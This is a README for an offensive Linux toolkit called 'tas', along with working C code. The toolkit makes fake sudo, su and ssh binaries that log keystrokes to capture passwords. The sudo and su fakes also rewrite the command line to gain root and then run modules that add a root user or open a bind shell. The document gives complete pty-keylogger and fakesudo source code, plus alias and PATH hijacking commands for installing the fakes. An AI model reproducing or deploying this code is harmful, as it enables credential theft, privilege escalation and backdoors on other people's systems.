A tiny framework for easily manipulating the tty and creating fake binaries.
How it works
The framework has three main functions: tas_execv, tas_forkpty and tas_tty_loop.
- tas_execv: a function similar to execv, except that it never re-executes the current binary. A fake binary that sits in PATH under the real program's name can therefore hand over to the real program without running itself again, which is exactly what a fake binary needs.
- tas_forkpty: the same as forkpty, but it fills in a custom structure; check the forkpty man page for details.
- tas_tty_loop: this is where the manipulation of the tty happens. You can set a hook function for the input and one for the output, so it is possible to store the keys typed by the user or to modify the terminal output (see leet-shell).
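As an added example (this is not code from tas; the page does not show the signatures of tas_forkpty or tas_tty_loop, so every name below is my own), here is the mechanism those two functions wrap: spawn the real program on a pseudo-terminal, put the user's real terminal into raw mode, and shuttle bytes in both directions through hook functions. The same hook type serves as a keylogger on the input side and as an output rewriter on the output side. Linux only; it opens the pty with posix_openpt instead of forkpty so it links without -lutil.

```c
/* Added example, not tas code: a pty relay with input/output hooks (the idea behind
   tas_forkpty + tas_tty_loop). Linux; posix_openpt instead of forkpty, so no -lutil. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>
#include <sys/select.h>
#include <sys/wait.h>

/* A hook sees each chunk moving one way, may rewrite it in place, and returns the
   (possibly shorter) length to forward. */
typedef size_t (*tty_hook)(char *buf, size_t len, void *ctx);

/* Sample hook: append everything to a NUL-terminated buffer. On the input side it is
   a keylogger; on the output side it records what the user saw. */
struct capture { char data[4096]; size_t used; };
size_t capture_hook(char *buf, size_t len, void *ctx) {
    struct capture *c = ctx;
    size_t room = sizeof c->data - 1 - c->used, n = len < room ? len : room;
    memcpy(c->data + c->used, buf, n);
    c->used += n; c->data[c->used] = '\0';
    return len;
}

/* What forkpty does: open a pty, fork, make the slave the child's controlling terminal
   and stdio, then exec argv. Returns the child's pid or -1. */
static pid_t spawn_on_pty(char *const argv[], int *master_out) {
    int master = posix_openpt(O_RDWR | O_NOCTTY);
    if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0) return -1;
    const char *slave_name = ptsname(master);
    pid_t pid = slave_name ? fork() : -1;
    if (pid < 0) return -1;
    if (pid == 0) {
        setsid();                       /* new session: the next tty opened becomes controlling */
        int slave = open(slave_name, O_RDWR);
        if (slave < 0) _exit(127);
        dup2(slave, 0); dup2(slave, 1); dup2(slave, 2);
        if (slave > 2) close(slave);
        close(master);
        execvp(argv[0], argv);
        _exit(127);
    }
    *master_out = master;
    return pid;
}

/* Run argv on a pty and shuttle bytes: user_in -> in_hook -> child and
   child -> out_hook -> user_out. Returns the wait status, or -1 without a pty. */
int tty_relay(char *const argv[], int user_in, int user_out,
              tty_hook in_hook, void *in_ctx, tty_hook out_hook, void *out_ctx) {
    int master, term_fd = user_in, status = -1;
    pid_t pid = spawn_on_pty(argv, &master);
    if (pid < 0) return -1;
    /* Raw mode on the user's real terminal: keystrokes arrive unprocessed and the
       child's pty does echo and line editing. Skipped when user_in is not a tty. */
    struct termios saved, raw;
    int restore = isatty(term_fd) && tcgetattr(term_fd, &saved) == 0;
    if (restore) { raw = saved; cfmakeraw(&raw); tcsetattr(term_fd, TCSANOW, &raw); }
    char buf[1024];
    for (;;) {
        fd_set rfds; FD_ZERO(&rfds); FD_SET(master, &rfds);
        if (user_in >= 0) FD_SET(user_in, &rfds);
        if (select((master > user_in ? master : user_in) + 1, &rfds, NULL, NULL, NULL) < 0) break;
        if (user_in >= 0 && FD_ISSET(user_in, &rfds)) {
            ssize_t n = read(user_in, buf, sizeof buf);
            if (n <= 0) user_in = -1;   /* user side closed: stop watching it */
            else {
                size_t m = in_hook ? in_hook(buf, (size_t)n, in_ctx) : (size_t)n;
                if (m && write(master, buf, m) < 0) break;
            }
        }
        if (FD_ISSET(master, &rfds)) {
            ssize_t n = read(master, buf, sizeof buf);
            if (n <= 0) break;          /* EIO: the child hung up its tty */
            size_t m = out_hook ? out_hook(buf, (size_t)n, out_ctx) : (size_t)n;
            if (m && write(user_out, buf, m) < 0) break;
        }
    }
    if (restore) tcsetattr(term_fd, TCSANOW, &saved);
    close(master);
    waitpid(pid, &status, 0);
    return status;
}

/* Offline demonstration: run cat on a pty, feed it a constructed line plus ^D from a
   pipe, and capture both directions. */
int demo_cat_roundtrip(struct capture *keys, struct capture *screen) {
    int p[2], devnull = open("/dev/null", O_WRONLY);
    if (devnull < 0 || pipe(p) < 0) return -1;
    if (write(p[1], "hello\n\4", 7) != 7) return -1;   /* constructed keystrokes; ^D ends cat */
    close(p[1]);
    char *const argv[] = { "cat", NULL };
    int st = tty_relay(argv, p[0], devnull, capture_hook, keys, capture_hook, screen);
    close(p[0]); close(devnull);
    return st;
}

/* Stand-alone: ./relay bash -i; everything typed is then in keys.data. */
int main(int argc, char **argv) {
    if (argc < 2) { fprintf(stderr, "usage: %s cmd [args]\n", argv[0]); return 2; }
    struct capture keys = { {0}, 0 };
    int st = tty_relay(argv + 1, STDIN_FILENO, STDOUT_FILENO, capture_hook, &keys, NULL, NULL);
    fprintf(stderr, "\r\n[relay] %zu bytes of input recorded\r\n", keys.used);
    return st < 0 ? 1 : WEXITSTATUS(st);
}
```

Two details matter for a fake binary built this way: the raw-mode switch is what makes the keystrokes visible to the hook before the line discipline processes them (and is why a fake that forgets to restore termios leaves a visibly broken terminal behind), and the loop ends on the EIO that Linux returns from the master once the child hangs up, not on the child's exit alone.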
Fakebins
Through manipulation of the PATH environment variable, or by using bash aliases (or any other shell that supports aliases), you can run another program instead of the one the user usually runs. This makes it possible to capture keystrokes and to modify the command line, changing the original program's behavior.
Changing the command line of programs like sudo and su can lead to privilege escalation.
I created three programs as examples of what you can do with the framework: sudo, su and generic-keylogger.
generic-keylogger
The generic-keylogger, as the name suggests, is a binary that acts like a keylogger; the main idea is to use it to grab the passwords typed into programs like ssh, mysql, etc.
sudo/su
It can be used as a keylogger, or, by manipulating the command line, it can run some of the modules as root.
Step-by-step cmd change:
The user types
sudo cmd
Because of the alias or the modified PATH, what actually runs is
fakesudo cmd
The fakesudo then executes
sudo fakesudo cmd
After it is running as root, fakesudo creates a child process to run the modules and, in the main PID, runs the original command.
Note: fakesudo only changes the command if the user runs sudo cmd [args]; if additional flags are used, the command isn't touched.
Almost the same happens with su:
The user types
su -
Because of the alias or the modified PATH, what actually runs is
fakesu -
The fakesu then executes
su - -c fakesu
After it is running as root, fakesu creates a child process to run the modules and, in the main PID, runs
bash -i
Note: fakesu only changes the command if the user runs su or su -; if additional flags are used, the command isn't touched.
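The two-stage trick described above, as an added example in C that is not the project's own fakesudo/fakesu source: rewrite_sudo and rewrite_su implement the command-line rules from the notes (only a plain sudo cmd [args], su and su - are touched), find_real_binary does what tas_execv is described as doing (resolve the real program through PATH while skipping the fake binary itself, here by comparing device and inode with /proc/self/exe), and main wires them into a fakesudo. The stage check (effective uid 0), the plain su becoming su -c fakesu, and the placeholder module child are my assumptions, not something the page states.

```c
/* Added example, not tas code: the fakesudo/fakesu command-line rewrite plus a PATH
   lookup that skips the fake binary itself (the tas_execv idea). Linux only. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Stage 1 for sudo: "sudo cmd [args]" becomes "sudo <self> cmd [args]". No command,
   or a flag first, leaves the line untouched and returns 0. Otherwise out[] is filled
   (NULL-terminated) and the entry count is returned. */
int rewrite_sudo(int argc, char *const argv[], const char *self, const char *out[], int cap) {
    if (argc < 2 || argv[1][0] == '-' || argc + 2 > cap) return 0;
    int k = 0;
    out[k++] = "sudo";
    out[k++] = self;
    for (int i = 1; i < argc; i++) out[k++] = argv[i];
    out[k] = NULL;
    return k;
}

/* Stage 1 for su: "su" or "su -" becomes "su [-] -c <self>"; anything else is left
   untouched. The plain "su" form is an assumption; the README shows only "su -". */
int rewrite_su(int argc, char *const argv[], const char *self, const char *out[], int cap) {
    int dash = argc == 2 && strcmp(argv[1], "-") == 0;
    if (!(argc == 1 || dash) || cap < 5) return 0;
    int k = 0;
    out[k++] = "su";
    if (dash) out[k++] = "-";
    out[k++] = "-c";
    out[k++] = self;
    out[k] = NULL;
    return k;
}

/* Resolve name through PATH, skipping any entry that is this very executable (same
   device and inode as /proc/self/exe), so a fake "sudo" finds the real one even when
   its own directory comes first in PATH. Returns 1 and fills out on success. */
int find_real_binary(const char *name, char *out, size_t cap) {
    struct stat self_st, st;
    if (stat("/proc/self/exe", &self_st) < 0) return 0;
    const char *path = getenv("PATH");
    char *copy = strdup(path ? path : "/usr/local/bin:/usr/bin:/bin"), *save = NULL;
    int found = 0;
    for (char *dir = strtok_r(copy, ":", &save); dir && !found; dir = strtok_r(NULL, ":", &save)) {
        snprintf(out, cap, "%s/%s", dir, name);
        found = stat(out, &st) == 0 && S_ISREG(st.st_mode) && access(out, X_OK) == 0 &&
                !(st.st_dev == self_st.st_dev && st.st_ino == self_st.st_ino);
    }
    free(copy);
    return found;
}

/* A fakesudo built from the pieces above. The stage is decided by the effective uid
   (an assumption; tas may use another marker). The module child is a placeholder. */
int main(int argc, char **argv) {
    char self[4096], real[4096];
    ssize_t n = readlink("/proc/self/exe", self, sizeof self - 1);
    if (n < 0) return 1;
    self[n] = '\0';
    if (geteuid() != 0) {                   /* stage 1: the user typed "sudo cmd" */
        const char *out[64];
        int k = rewrite_sudo(argc, argv, self, out, 64);
        if (!find_real_binary("sudo", real, sizeof real)) return 127;
        execv(real, k ? (char *const *)out : argv);
        return 127;                         /* exec failed */
    }
    /* stage 2: sudo re-ran us as root with argv = { self, cmd, args... }. Modules go in
       a child; the user's command keeps the main PID so the session looks normal. */
    if (fork() == 0) { /* module work (add-root-user, bind-shell, ...) would run here */ _exit(0); }
    if (argc < 2) return 0;
    execvp(argv[1], argv + 1);
    return 127;
}
```

The device/inode comparison is the part worth copying: a fake sudo that resolves the real binary by name alone, with ~/.bin first in PATH, just execs itself forever. For the su variant the stage 2 branch would exec bash -i instead of argv[1], as the walkthrough above describes.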
Modules
For now, there are only three modules:
- add-root-user - creates a root user with password in /etc/passwd.
- bind-shell - listen for incoming connections and spawn a tty shell.
- system - executes a command as root.
super() function.
Building
First, build the base library:
$ make
CC .obj/globals.o
CC .obj/getinode.o
CC .obj/tas-execv.o
CC .obj/tty.o
CC .obj/xreadlink.o
AR .obj/libtas.a
Then build the fake binary you want:
make [target-bin]
Example:
$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu ...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'
Examples
Creating a fakessh:
Compile:
$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger ...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'
$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc
Using the bind-shell module
Compile:
$ make sudo
make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo ...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'
$ cp sudo ~/.sudo
$ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc
leet-shell
leet-shell is an example of how you can manipulate the tty output; it lets you use bash like a 1337 h4x0r.
[test@alfheim tas]$ make fun/leet-shell
CC fun/leet-shell
[t3st@alfheim tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3 !!!
[t3st@4lfh31m t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!'
l33t sh3ll 1s l33t !!!